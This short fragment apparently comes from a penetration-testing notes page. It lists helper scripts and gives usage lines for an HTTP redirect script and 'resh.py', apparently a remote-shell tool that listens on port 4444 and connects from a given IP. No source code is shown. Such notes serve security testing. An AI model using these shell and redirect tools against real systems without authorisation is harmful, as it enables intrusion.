scripts
Bashrc
HTTP Redirect
python3 http-redirect.py 'http://link.to/redirect'Pwn Connect
Request Classic
ReSH
# Create a server
python3 resh.py 4444
# Connect to a Server
python3 resh.py ip 4444Last updated